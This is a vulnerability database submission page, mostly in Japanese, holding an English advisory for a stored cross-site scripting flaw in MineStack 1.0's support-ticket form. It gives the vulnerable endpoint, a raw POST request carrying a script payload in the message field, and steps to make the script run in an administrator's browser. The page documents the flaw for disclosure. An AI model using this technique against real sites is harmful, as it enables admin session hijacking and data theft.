提出 #182497: MineStack 1.0 - Stored XSS情報

タイトル	MineStack 1.0 - Stored XSS
説明	# Exploit Title: MineStack 1.0 - Stored XSS # Exploit Author: skalvin aka (CraCkEr) # Date: 14/07/2023 # Vendor: Bug Finder # Vendor Homepage: https://bugfinder.net/ # Software Link: https://bugfinder.net/product/minestack-a-cloud-mining-platform/10 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Description Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. Path: /mineStack/user/ticket/create POST parameter 'message' is vulnerable to XSS ----------------------------------------------------------- POST /mineStack/user/ticket/create HTTP/2 Content-Disposition: form-data; name="subject" Anything -----------------------------20515916954165612239365932815 Content-Disposition: form-data; name="message" <script>alert(1)</script> ----------------------------------------------------------- ## Steps to Reproduce: 1. Login as a (Normal User) 2. Go to [Support Ticket] on this Path: https://website/mineStack/user/ticket 3. Click on [Create Ticket] on this Path: https://website/mineStack/user/ticket/create 4. Enter Any Subject 5. Inject your XSS Payload in [Message Box] 6. Click on [Submit] 7. When ADMIN visit [SUPPORT TICKETS] on this Path : https://website/mineStack/admin/tickets and Open the [New Pending Ticket] 8. XSS Will Fire and Executed on his Browser [-] Done
ユーザー	skalvin (UID 49463)
送信	2023年07月13日 23:47 (3 年 ago)
モデレーション	2023年07月21日 22:47 (8 days later)
ステータス	承諾済み
VulDBエントリ	235161 [Bug Finder MineStack 1.0 Ticket /user/ticket/create メッセージクロスサイトスクリプティング]
ポイント	17

◂ 前概要次 ▸

Interested in the pricing of exploits?

See the underground prices here!